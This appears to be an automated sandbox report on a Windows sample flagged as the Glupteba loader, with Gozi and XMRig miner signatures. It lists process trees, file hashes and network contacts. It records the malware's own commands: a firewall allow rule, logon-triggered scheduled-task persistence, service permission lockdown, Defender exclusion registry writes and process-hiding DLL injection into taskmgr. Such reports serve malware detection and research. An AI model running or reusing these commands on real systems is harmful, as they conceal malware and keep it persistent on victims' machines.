N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4404 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4404 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\System32\cmd.exe
PID 1408 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\System32\cmd.exe
PID 1476 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\netsh.exe
PID 1476 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\netsh.exe
PID 1408 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1408 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 1408 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 1408 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 5088 wrote to memory of 1684 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 1684 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 1684 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 2956 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 2956 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 2956 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 4476 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 4476 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 4476 N/A C:\Windows\rss\csrss.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 2872 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 5088 wrote to memory of 2872 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 1752 wrote to memory of 3376 N/A C:\Windows\windefender.exe C:\Windows\SysWOW64\cmd.exe
PID 1752 wrote to memory of 3376 N/A C:\Windows\windefender.exe C:\Windows\SysWOW64\cmd.exe
PID 1752 wrote to memory of 3376 N/A C:\Windows\windefender.exe C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3376 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe

"C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe

"C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 88c40a03-a485-45a9-a6b0-1af072c047de.uuid.dumppage.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.l.google.com udp
US 8.8.8.8:53 server4.dumppage.org udp
US 162.159.134.233:443 cdn.discordapp.com tcp
BG 185.82.216.111:443 server4.dumppage.org tcp
GB 142.251.29.127:19302 stun.l.google.com udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 127.29.251.142.in-addr.arpa udp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 71.221.67.172.in-addr.arpa udp
US 8.8.8.8:53 111.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
BG 185.82.216.111:443 server4.dumppage.org tcp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp
BG 185.82.216.111:443 server4.dumppage.org tcp
US 8.8.8.8:53 45.179.17.96.in-addr.arpa udp
N/A 127.0.0.1:31465 tcp
BG 185.82.216.111:443 server4.dumppage.org tcp

Files

memory/4404-1-0x0000000003BC0000-0x0000000003FC6000-memory.dmp

memory/4404-2-0x0000000003FD0000-0x00000000048BB000-memory.dmp

memory/4404-3-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/3168-6-0x0000000006720000-0x0000000006756000-memory.dmp

memory/3168-7-0x0000000073A60000-0x000000007414E000-memory.dmp

memory/3168-8-0x00000000067E0000-0x00000000067F0000-memory.dmp

memory/3168-9-0x00000000067E0000-0x00000000067F0000-memory.dmp

memory/3168-10-0x0000000006E20000-0x0000000007448000-memory.dmp

memory/3168-11-0x0000000007450000-0x0000000007472000-memory.dmp

memory/3168-12-0x00000000075F0000-0x0000000007656000-memory.dmp

memory/3168-13-0x0000000007740000-0x00000000077A6000-memory.dmp

memory/3168-14-0x0000000007800000-0x0000000007B50000-memory.dmp

memory/3168-15-0x0000000007BB0000-0x0000000007BCC000-memory.dmp

memory/3168-16-0x0000000007BE0000-0x0000000007C2B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jqpfwof3.1pr.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3168-35-0x0000000008C30000-0x0000000008C6C000-memory.dmp

memory/3168-66-0x0000000008CF0000-0x0000000008D66000-memory.dmp

memory/3168-73-0x000000007ED50000-0x000000007ED60000-memory.dmp

memory/3168-74-0x0000000009B50000-0x0000000009B83000-memory.dmp

memory/3168-75-0x0000000070770000-0x00000000707BB000-memory.dmp

memory/3168-76-0x00000000707C0000-0x0000000070B10000-memory.dmp

memory/3168-77-0x0000000009B30000-0x0000000009B4E000-memory.dmp

memory/3168-82-0x0000000009B90000-0x0000000009C35000-memory.dmp

memory/3168-83-0x00000000067E0000-0x00000000067F0000-memory.dmp

memory/3168-84-0x0000000009D70000-0x0000000009E04000-memory.dmp

memory/4404-259-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/4404-262-0x0000000003BC0000-0x0000000003FC6000-memory.dmp

memory/4404-264-0x0000000003FD0000-0x00000000048BB000-memory.dmp

memory/3168-280-0x0000000006A50000-0x0000000006A6A000-memory.dmp

memory/3168-285-0x0000000006A40000-0x0000000006A48000-memory.dmp

memory/3168-303-0x0000000073A60000-0x000000007414E000-memory.dmp

memory/4404-304-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1408-306-0x0000000003B00000-0x0000000003EFC000-memory.dmp

memory/1408-307-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1320-310-0x0000000073B60000-0x000000007424E000-memory.dmp

memory/1320-312-0x0000000002980000-0x0000000002990000-memory.dmp

memory/1320-311-0x0000000002980000-0x0000000002990000-memory.dmp

memory/1320-313-0x0000000007700000-0x0000000007A50000-memory.dmp

memory/1320-314-0x0000000007DC0000-0x0000000007E0B000-memory.dmp

memory/1320-333-0x000000007F710000-0x000000007F720000-memory.dmp

memory/1320-334-0x0000000070890000-0x00000000708DB000-memory.dmp

memory/1320-335-0x00000000708E0000-0x0000000070C30000-memory.dmp

memory/1320-340-0x0000000008F90000-0x0000000009035000-memory.dmp

memory/1320-341-0x0000000002980000-0x0000000002990000-memory.dmp

memory/1320-555-0x0000000073B60000-0x000000007424E000-memory.dmp

memory/1408-556-0x0000000000400000-0x0000000001E11000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

memory/1200-560-0x0000000073B60000-0x000000007424E000-memory.dmp

memory/1200-561-0x0000000006EA0000-0x0000000006EB0000-memory.dmp

memory/1408-562-0x0000000003B00000-0x0000000003EFC000-memory.dmp

memory/1200-563-0x0000000006EA0000-0x0000000006EB0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 2b6c506a0d50bbc75a9566947e926ec9
SHA1 67c5a1e7574b4017bf24c8e30d6e12458c3558ac
SHA256 0d176367c76499ea776cb9ee7490411b5c82dcf6be206d5974a9c190688620ab
SHA512 5da966d7d5527f00826bf964a6a746dd53048cd8e6e9c36321cacccb9412e262e022efd274ceed6f20562ea34a8f0b6c04d55115b437101cb37641a01e90339c

memory/1200-583-0x0000000070890000-0x00000000708DB000-memory.dmp

memory/1200-584-0x00000000708E0000-0x0000000070C30000-memory.dmp

memory/1408-586-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1200-590-0x0000000006EA0000-0x0000000006EB0000-memory.dmp

memory/1200-803-0x0000000073B60000-0x000000007424E000-memory.dmp

memory/1408-805-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/4800-807-0x0000000073B60000-0x000000007424E000-memory.dmp

memory/4800-808-0x0000000007070000-0x0000000007080000-memory.dmp

memory/4800-809-0x0000000007070000-0x0000000007080000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 bdb432543f611637075443c76423086c
SHA1 5d44c1791c6d40b55a83d80530e3dbff66db767f
SHA256 f64f8ba0c94bc2924434fcf4e174b1897c4846a4ef771c64ce5611c1dc07c47f
SHA512 6a6e14f6d35d962e37c009dbb9329ef4915c970a8f144d4e7980cdbbf87c2aff506b6309b4a2192c1f4c0cf076ec5d9f692b1c0a8f4b523ef90980806fc76dab

memory/4800-829-0x0000000070890000-0x00000000708DB000-memory.dmp

memory/4800-830-0x00000000708E0000-0x0000000070C30000-memory.dmp

memory/4800-835-0x0000000007070000-0x0000000007080000-memory.dmp

memory/4800-1048-0x0000000073B60000-0x000000007424E000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 c8547afa1600ea08f4b6c07eccf14fc3
SHA1 6b2772a83692fca0317e3c0b9afe3eef1c978079
SHA256 bf75445061e32c8733fd4d6d46b6f386d083efe525658f6eb8f4e3164dd31822
SHA512 8c7ce913d279fb8e03399455072c2a87b1ed898ed2e1464f2d8b4bd0a39ccb543e775f21fd228a29669abcb58f03e6b0d5b8928b05b30d25b44e92216066cdbe

C:\Windows\rss\csrss.exe

MD5 49625ac40a34ae1839f287e30251580d
SHA1 420a1eef9f57933518461f32300505eae025dc24
SHA256 f4c72dd533d806e657317064d15a65cea8084aa1c25e1d4c4faca1542e813b4b
SHA512 7540ebd4715d802322c604e46cd5b393822e3491c631281df1132e889fdfba6a4d74b348be57897d2d22cd8c3f3c4c0c36ef9ca4f2e9d2b773e34f434cb8b9a1

memory/1408-1052-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1055-0x0000000004100000-0x00000000044F9000-memory.dmp

memory/5088-1056-0x0000000004500000-0x0000000004DEB000-memory.dmp

memory/5088-1057-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1684-1061-0x00000000073C0000-0x00000000073D0000-memory.dmp

memory/1684-1060-0x0000000073AC0000-0x00000000741AE000-memory.dmp

memory/1684-1062-0x00000000073C0000-0x00000000073D0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6229d99247a73a49bb2e6cf2ab4c8bb3
SHA1 bdbdf4818bf19df0e3f49fdcd037083a41f9f36b
SHA256 c149a72e7aa02da9de8d318d45ae18ba899bb7f02db6cfcd0a3d4b7dc8f72667
SHA512 41722a09074a3a5c784929de0db61beada8000bde45d86fdd44b5025fd1a4965ae14db3e621d77cf01ee08230c4e62c52a46016a59964dd9ce2d244cc294ebf8

memory/5088-1305-0x0000000000400000-0x0000000001E11000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 399ae37d9a1f08eead0c57fc1f051da8
SHA1 b82048686527a5ade7db31a6f6b012e1f35d55aa
SHA256 d388acf98b40c662ad26370489a97b49385e1164cdf0096fc103cff12b0b2d4f
SHA512 e67b2d3bc5c256be81766e045173917d84b0d6f087cb6038a8b3875ba82070cc2f7fa3a1097d2ac3f38831282746393cfb12273c5e0d322ace4906dc34634c4a

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 697459bcf8d50154e6d9cf2cb4ecf6eb
SHA1 1a467284cc96d1252661c4da4c347137051efe6d
SHA256 6fca60d0a2c3840a773208386f57fde149e00c3bcb80cd59dd017db7075e73ce
SHA512 fd10a825c432b8110e2793a7c925452aad0561792b32cfc21e0a5e3e8f53b007e8001afb80ad9cc41a3280c97ffc0a24cb987d4e9e7aa480254c8d32015eac8a

memory/5088-1800-0x0000000000400000-0x0000000001E11000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/5088-1809-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1752-1814-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/5088-1815-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5024-1816-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/5088-1817-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1819-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5024-1820-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/5088-1821-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1823-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1825-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1827-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1829-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1831-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1833-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1835-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1837-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1839-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1841-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1843-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1845-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1847-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1849-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1851-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1853-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1855-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/5088-1857-0x0000000000400000-0x0000000001E11000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-07 04:53

Reported

2024-03-07 04:58

Platform

win7-20240221-en

Max time kernel

286s

Max time network

300s

Command Line

"C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gozi

banker trojan gozi

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe = "0" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

